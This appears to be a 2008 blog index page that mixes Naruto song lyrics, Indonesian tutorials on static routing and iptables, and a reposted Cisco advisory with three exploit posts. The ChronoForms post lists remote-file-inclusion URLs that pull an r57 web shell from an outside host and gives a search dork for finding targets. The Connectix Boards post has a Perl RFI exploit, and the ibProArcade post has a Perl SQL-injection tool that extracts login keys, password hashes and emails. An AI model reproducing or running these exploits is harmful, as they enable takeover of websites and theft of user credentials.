Software And Internet Blog





January 31, 2008

OST Naruto - Seishun Kyousoukyoku

Filed under: Song Lyrics

Let’s Get a Cup of Water

Hikarabita kotoba wo tsunaide
Soredemo boku no shinpuru na
Omoi wo tsutaetai dakenano

Fukinukeru kusunda ano hi no kaze wa
Kinou no haikyo ni uchisutete
Kimi to warau ima wo ikiru no da

Soredemo kono dekigoto ga
Kimi wo kurushimeru daro
Dakarakoso sayonara nanda

Konomama nani mo nokorazu ni
Anata to wakachiau dake
Yagate bokura wa
Sorega subete dato kigatsuite

Kanashimi ga hoho wo tsutatte
Namida no kawa ni narudake
Yureru omoi wa tsuyoi uzu ni natte
Tokeau no yo
(more…)

Bug - Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities

Filed under: System Security

+_________________________________________
By Crackers_Child
___________________________________________+

*
*
* [~] Script…….: CHRONOFORMS version V2.3.5
* [~] Down………: http://www.joomlaos.de/option,com_remository/Itemid,41/func,startdown/id,2810.html
* [~] Author…….: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com
* [~] Class……..: Remote File İnclude Vulnerability
* [~] Dork………: inurl:/com_chronocontact
* [~] ForFix………: For Fix Your Script Download http://www.chronoengine.com/component/option,com_docman/task,cat_view/gid,27/ 2.3.7 Version
+_________________________________________________________________________+

+_______________________________________________________________________+
*
*
*
*
* [~] Exploit Rfi…:http://[Taget]/[Path]//administrator/components/com_chronocontact/excelwriter/PPS/
File.php?mosConfig_absolute_path=http://www.sibersavascilar.com/shelz/r57.txt?
*
*
* /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=
http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=
http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=
http://www.sibersavascilar.com/shelz/r57.txt?
*
* /administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=
http://www.sibersavascilar.com/shelz/r57.txt?
*
*
(more…)

January 30, 2008

Static Routes (Rute Statik)

Filed under: Internet Technology

Rute Statik adalah rute atau jalur spesifik yang ditentukan oleh user untuk meneruskan paket dari sumber ke tujuan. Rute ini ditentukan oleh administrator untuk mengontrol perilaku routing dari IP “internetwork”.

Pentingnya Rute Statik

Rute Statik menjadi sangat penting jika software IOC Cisco tidak bisa membentuk sebuah rute ke tujuan tertentu. Rute Statik juga sangat berguna untuk membuat “gateway” untuk semua paket yang tidak bisa di”routing”.(default route).

“Stub Network”

Rute Statik, umumnya digunakan untuk jalur/path dari jaringan ke sebuah “stub network” (jaringan yang dibelakangnya tidak ada jaringan lain).

staticroute1.gif

Sebuah “stub network’ (kadang di sebut “leaf node”) adalah jaringan yang hanya dapat diakses melalui satu rute. Seringkali, rute statik digunakan sebagai jalan satu-satunya untuk keluar masuk jaringan Stub.

Catatan : Rute statik dapat digunakan untuk koneksi ke suatu network yang tidak terhubung langsung dengan router anda. Untuk koneksi “end-to-end”, rute statik harus dikonfigurasi di dua arah.

Konfigurasi Rute Statik

Mengkonfigurasi Rute statik adalah dengan memasukkan tabel routing secara manual. Tidak terjadi perubahan dinamik dalam tabel ini selama jalur/rute aktif.

Perintah “ip route”

Perintah “ip route” digunakan untuk mengkonfigurasi sebuah rute statik dalam mode konfigurasi global.

ip route Command Syntax

Sintak untuk perintah “ip route” adalah sebagai berikut :
ip route network [mask] {address | interface}[distance] [permanent]

Parameter Perintah “ip route”

network : Network atau subnet tujuan

mask : Subnet mask

address : Alamat IP router Hop berikutnya.(IP address of next-hop router)
(more…)

IPTables Firewall

Filed under: Internet Technology

Artikel ini saya peroleh dari linux.or.id dan adapun yang mempublishnya adalah Budi Santoso dan Hasan dari PT Ardelindo 1991, sengaja saya publish di blog saya karena saya sendiri kadang2 lupa konfigurasi IPTables di Linux dan buat temen-temen yang baru belajar IPTablesnya Linux, artikel ini mungkin dapat sedikit membantu.

Terima kasih saya ucapkan kepada pihak yang terlibat dalam pembuatan artikel ini saya berharap semakain kedepan semakin banyak praktisi IT yang semakin membuka dukungannya guna kemajuan IT di negara kita tercinta ini. GO OPEN SOURCE :D

Mastering IPTables Seri 1

Anda pasti pernah mendengar yang disebut dengan firewall pada jaringan komputer, kalo kita jadikan bahasa indonesia berarti tembok api. Aneh dan Lucu, tetapi punya fungsi yang penting untuk melindungi jaringan intranet dari serangan hacker maupun akses ilegal.

Selain meningkatkan keamanan firewall berguna untuk mengatur akses internet yang boleh dipakai pengguna, misalkan pak Joko bisa pakai yahoo messenger dan pak Ali ngga bisa pakai Yahoo Messenger. Nah untuk mengatur akses tadi kita memakai aplikasi firewall linux yaitu iptables.

Firewall adalah perangkat komputer yang kita fungsikan sebagai router untuk memisahkan jaringan intranet dan internet. Firewall memiliki dua kartu jaringan, eth0 berhubungan langsung dengan internet dan eth1tersambung dengan jaringan LAN / Intranet

Pada Mastering Firewall IPTables Seri - 1 ini kita membahas prinsip dasar firewall iptables, mengelola akses internet berdasarkan alamat IP,port aplikasi dan MAC address. Firewall IPTables packet filtering memiliki tiga aturan (policy), yaitu:
(more…)

Cisco Security Advisory : Cisco Wireless Control System Tomcat mod_jk.so Vulnerability

Filed under: System Security

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1

Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so
Vulnerability

Advisory ID: cisco-sa-20080130-wcs

http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml

Revision 1.0

For Public Release 2008 January 30 1600 UTC (GMT)

+———————————————————————–

Summary
=======

Apache Tomcat is the servlet container for JavaServlet and JavaServer
Pages Web within the Cisco Wireless Control System (WCS). A
vulnerability exists in the mod_jk.so URI handler within Apache Tomcat
which, if exploited, may result in a remote code execution attack.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml.

Affected Products
=================

This section provides details on affected products.

Vulnerable Products
+——————

Cisco WCS devices running software 3.x and 4.0.x prior to 4.0.100.0 are
affected by this vulnerability. Cisco WCS devices running software 4.1.x
and 4.2.x prior to to version 4.2.62.0 are also vulnerable.

Note: The version of WCS software installed on a particular device can
be found via the WCS HTTP management interface. Select
“Help -> About the Software” to obtain the software version.

Products Confirmed Not Vulnerable
+——————————–

No other Cisco products are currently known to be affected by this
vulnerability.
(more…)

Bug - Connectix Boards 0.8.2 template_path - Remote File Inclusion Exploit

Filed under: System Security

#!/usr/bin/perl
#
# Author : HouSSaMix From H-T Team
# Script : Connectix Boards ( Tested in last version 0.8.2 & 0.8.1 )
# Bug : Remote File Inclusion
# Vulnerable Code : < ?php include ($template_path.'menu_links.php'); ?>
# Dork : powered by connectix boards
# Risk : High
# Download : http://www.connectix-boards.org/
# Exploit: http://Target.il/[path]/templates/Official/part_userprofile.php?template_path=[Shell]

use LWP::Simple;

print “————————-[ H-T Team ]————————–\n”;
print “- -\n”;
print “- Connectix Boards < =0.8.2 - Remote File Inclusion -\n";
print "- -\n";
print "---------------------------------------------------------------\n";
print "- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo -\n";
print "- Bug found and Coded By HouSSaMix & ToXiC350 -\n";
print "---------------------------------------------------------------\n\n";
(more…)

Bug - ibProArcade 3.3.0 - Remote SQL Injection Exploit

Filed under: System Security

#!/usr/bin/perl

## ibProArcade < = v3.3.0 sql injection exploit
## (c)oded by 1dt.w0lf
## RST/GHC

## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
## KEEP IT PRIVATE

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

BEGIN {
if($^O eq 'MSWin32'){
require Win32::Console;
Win32::Console::Free();
}
}

$mw = new MainWindow(title => “r57ibProArcade” );

$mw->geometry ( ‘420x310′ ) ;
$mw->resizable(0,0);

$mw->Label(-text => ‘!’, -font => ‘{Webdings} 22′)->pack();
$mw->Label(-text => ‘ibProArcade sql injection exploit by RST/GHC’, -font => ‘{Verdana} 7 bold’,-foreground=>’red’)->pack();
$mw->Label(-text => ‘’)->pack();

$fleft=$mw->Frame()->pack ( -side => ‘left’, -anchor => ‘ne’) ;
$fright=$mw->Frame()->pack ( -side => ‘left’, -anchor => ‘nw’) ;

$url = ‘http://127.0.0.1/ipb216/index.php’;
$user_id = ‘1′;
$prefix = ‘ibf_’;
$column = ‘member_login_key’;
$report = ‘’;
$true = 0;
$false = 0;

$fleft->Label ( -text => ‘Path to forum index: ‘, -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8′, -textvariable => \$url) ->pack ( -side => “top” , -anchor => ‘w’ ) ;

$fleft->Label ( -text => ‘User ID: ‘, -font => ‘{Verdana} 8 bold’ ) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8′, -textvariable => \$user_id) ->pack ( -side => “top” , -anchor => ‘w’ ) ;

$fleft->Label ( -text => ‘Database tables prefix: ‘, -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Entry ( -relief => “groove”, -width => 35, -font => ‘{Verdana} 8′, -textvariable => \$prefix) ->pack ( -side => “top” , -anchor => ‘w’ ) ;

$fright->Label( -text => ‘ ‘)->pack();
$fleft->Label( -text => ‘ ‘)->pack();

$fleft->Label ( -text => ‘get data from database’, -font => ‘{Verdana} 8 bold’,-foreground=>’green’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$fright->Label( -text => ‘ ‘)->pack();

$fleft->Label ( -text => ‘Get data from column: ‘, -font => ‘{Verdana} 8 bold’) ->pack ( -side => “top” , -anchor => ‘e’ ) ;
$b = $fright->BrowseEntry( -relief => “groove”, -variable => \$column, -font => ‘{Verdana} 8′);
$b->insert(”end”, “member_login_key”);
$b->insert(”end”, “name”);
$b->insert(”end”, “ip_address”);
$b->insert(”end”, “legacy_password”);
$b->insert(”end”, “email”);
$b->pack( -side => “top” , -anchor => ‘w’ );
(more…)








Get free blog up and running in minutes with Blogsome
Theme designed by B A Khan